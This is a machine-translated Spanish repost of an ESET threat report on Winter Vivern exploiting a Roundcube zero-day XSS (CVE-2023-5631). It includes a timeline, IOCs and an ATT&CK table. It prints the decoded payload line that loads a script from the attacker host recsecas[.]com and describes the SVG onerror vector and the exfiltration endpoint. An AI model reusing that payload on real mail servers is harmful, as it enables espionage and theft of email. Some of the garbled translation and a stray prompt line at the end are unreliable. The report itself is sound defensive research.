Winter Vivern explota la vulnerabilidad de día cero en los servidores de correo web de Roundcube
investigación de ESET
ESET Research recomienda actualizar Roundcube Webmail a la última versión disponible lo antes posible
25 de octubre de 2023
•
,
5 minutos. leer

ESET Research ha estado siguiendo de cerca las operaciones de ciberespionaje de Winter Vivern durante más de un año y durante nuestro monitoreo de rutina descubrimos que el grupo comenzó a explotar un sistema de día cero. XSS Vulnerabilidad en el servidor de correo web Roundcube el 11 de octubreTh2023. Esta es una vulnerabilidad diferente a la CVE-2020-35730que, según nuestra investigación, también fue explotado por el grupo.
Según los datos de telemetría de ESET, la campaña se dirigió a los servidores de correo web Roundcube pertenecientes a agencias gubernamentales y a un grupo de expertos en Europa.
Calendario de divulgación de vulnerabilidades:
- 12 de octubre de 2023: ESET Research ha informado de la vulnerabilidad al equipo de Roundcube.
- 14 de octubre de 2023: El equipo de Roundcube respondió e identificó la vulnerabilidad de seguridad.
- 14 de octubre de 2023: El equipo de Roundcube ha solucionado la vulnerabilidad.
- 16 de octubre de 2023: El equipo de Roundcube ha publicado actualizaciones de seguridad para abordar la vulnerabilidad (1.6.4, 1.5.5 y 1.4.15).
- 18 de octubre de 2023: ESET CNA emite un CVE para la vulnerabilidad (CVE-2023-5631).
- 25 de octubre de 2023: Publicación del blog de investigación de ESET.
Nos gustaría agradecer a los desarrolladores de Roundcube por su rápida respuesta y por solucionar la vulnerabilidad en tan poco tiempo.
Perfil de Vivern de invierno
Winter Vivern es un grupo de ciberespionaje revelado por primera vez por Herramientas de dominio en 2021. Se cree que ha estado activo desde al menos 2020 y está dirigido a gobiernos de Europa y Asia Central. Para comprometer sus objetivos, el grupo utiliza documentos maliciosos, sitios web de phishing y una puerta trasera de PowerShell personalizada (consulte los artículos de Centro Estatal de Protección Cibernética de Ucrania y de Laboratorios centinela). Creemos con poca confianza que Winter Vivern está relacionado Gorila de bigoteun sofisticado grupo aliado de Bielorrusia sobre el que publicamos por primera vez en agosto de 2023.
Winter Vivern ha estado apuntando a los servidores de correo electrónico gubernamentales de Zimbra y Roundcube desde al menos 2022; consulte este artículo de Punto de prueba. En particular, observamos que el grupo se dedicaba a la explotación CVE-2020-35730otra vulnerabilidad XSS en Roundcube, en agosto y septiembre de 2023. Tenga en cuenta esto sednit (también conocido como APT28) también explota esta antigua vulnerabilidad XSS en Roundcube, a veces contra los mismos objetivos.
Detalles técnicos
Explotación de la vulnerabilidad XSS, asignada CVE-2023-5631, se puede hacer de forma remota enviando un mensaje de correo electrónico especialmente diseñado. En esta campaña de Winter Vivern, los correos electrónicos fueron enviados por equipo.administración@outlook[.]com y tenia el tema Comience en su Outlookcomo se muestra en Ilustración 1.

A primera vista, el correo electrónico no parece ser malicioso, pero si miramos el código fuente HTML que se muestra en Figura 2Al final vemos una etiqueta SVG que contiene una carga útil codificada en Base64.

Una vez que decodificamos el valor codificado en Base64 en el href atributo de usar Día, tenemos:
Argumento de valor de href El atributo no es una URL válida de este objeto. error El atributo está activado. Decodificando la carga útil en error El atributo nos proporciona el siguiente código JavaScript (con la URL maliciosa desactivada manualmente) que se ejecuta en el navegador de la víctima en el contexto de su sesión de Roundcube:
var fe=document.createElement(‘script’);fe.src=»https://recsecas[.]com/controlserver/checkupdate.js»;document.body.appendChild(fe);
Sorprendentemente, descubrimos que la inyección de JavaScript funcionó en una instancia de Roundcube completamente parcheada. Esto resultó ser una vulnerabilidad XSS de día cero que afecta al script del lado del servidor. rcube_washtml.php, lo que hace que el documento SVG malicioso no se desinfecte adecuadamente antes de agregarlo a la página HTML interpretada por un usuario de Roundcube. Lo informamos a Roundcube y era cierto. parcheado el 14 de octubreTh2023 (ver aquí comprometerse). La vulnerabilidad de seguridad afecta a Roundcube Versiones 1.6.x antes de 1.6.4, 1.5.x antes de 1.5.5 y 1.4.x antes de 1.4.15.
En resumen, al enviar un mensaje de correo electrónico especialmente diseñado, los atacantes pueden cargar código JavaScript arbitrario en el contexto de la ventana del navegador del usuario de Roundcube. No se requiere ninguna interacción manual aparte de ver el mensaje en un navegador web.
La segunda etapa es un cargador de JavaScript simple llamado checkupdate.js y se muestra en figura 3.

La carga útil final de JavaScript, que se muestra en Figura 4 – es capaz de enumerar carpetas y correos electrónicos en la cuenta actual de Roundcube y filtrar mensajes de correo electrónico a través de solicitudes HTTP al servidor C&C https://recsecas[.]es/controlserver/saveMessage.

Diploma
Winter Vivern ha fortalecido sus operaciones explotando una vulnerabilidad de día cero en Roundcube. Anteriormente explotó vulnerabilidades conocidas en Roundcube y Zimbra, cuyas pruebas de concepto están disponibles en línea.
A pesar de la baja sofisticación del conjunto de herramientas del grupo, representa una amenaza para los gobiernos de Europa debido a su naturaleza persistente, campañas de phishing muy regulares y un número significativo de aplicaciones basadas en Internet que no se actualizan periódicamente a pesar de que se sabe que contienen vulnerabilidades.
Si tiene alguna pregunta sobre nuestra investigación publicada en WeLiveSecurity, contáctenos en [email protected].
ESET Research proporciona informes de inteligencia y fuentes de datos privados de APT. Si tiene alguna pregunta sobre este servicio, visite Inteligencia de amenazas de ESET Página.
COI
archivos
|
SHA-1 |
Nombre del archivo |
reconocimiento |
Descripción |
|
97ED594EF2B5755F0549C6C5758377C0B87CFAE0 |
checkupdate.js |
JS/WinterVivern.B |
Cargador de JavaScript. |
|
8BF7FCC70F6CE032217D9210EF30314DDD6B8135 |
N / A |
JS/Kryptik.BIK |
Carga útil de JavaScript que filtra correos electrónicos en Roundcube. |
red
|
IP |
dominio |
Proveedor de alojamiento |
Visto por primera vez |
detalles |
|
38.180,76[.]31 |
recsecas[.]com |
M247 Europa SRL |
28 de septiembre de 2023 |
Servidor Winter Vivern C&C |
Dirección de correo electrónico
equipo.administración@outlook[.]com
Esta tabla fue creada con Versión 13 del marco MITRE ATT&CK.
|
táctica |
IDENTIFICACIÓN |
Apellido |
Descripción |
|
Desarrollo de recursos |
Compra de infraestructura: dominios |
Los operadores de Winter Vivern han comprado un dominio de Registrar.eu. |
|
|
Compra de infraestructura: servidores |
Los operadores de Winter Vivern han alquilado un servidor de M247. |
||
|
Desarrollar habilidades: hazañas |
Los operadores de Winter Vivern probablemente hayan desarrollado un exploit para Roundcube. |
||
|
Primer acceso |
Explotar una aplicación disponible públicamente |
Winter Vivern envió un correo electrónico explotando CVE-2023-5631 en Roundcube. |
|
|
phishing |
La vulnerabilidad se activa a través de un correo electrónico de phishing que la víctima debe abrir en el correo web de Roundcube. |
||
|
ejecución |
Explotación para la ejecución del cliente. |
La carga útil de JavaScript se ejecuta a través de una vulnerabilidad XSS en Roundcube. |
|
|
descubrimiento |
Reconocimiento de cuenta: cuenta de correo electrónico |
La carga útil de JavaScript puede enumerar carpetas en la cuenta de correo electrónico. |
|
|
recopilación |
Recopilación de correo electrónico: recopilación remota de correo electrónico |
La carga útil de JavaScript puede filtrar correos electrónicos de la cuenta de Roundcube. |
|
|
Controlar y controlar |
Protocolo de capa de aplicación: protocolos web |
La comunicación C&C utiliza HTTP. |
|
|
Exfiltración |
Exfiltración a través del canal C2 |
La exfiltración se produce a través de HTTP y al mismo servidor C&C. |
Nos llegó este contenido de ciberseguridad de: Welivesecurity (blog de ESET sobre amenazas de seguridad)
Llegarás a la noticia original en el enlace que sigue: https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/
write a shot sentence in spanish about who ESET, the Cybersecurity company»

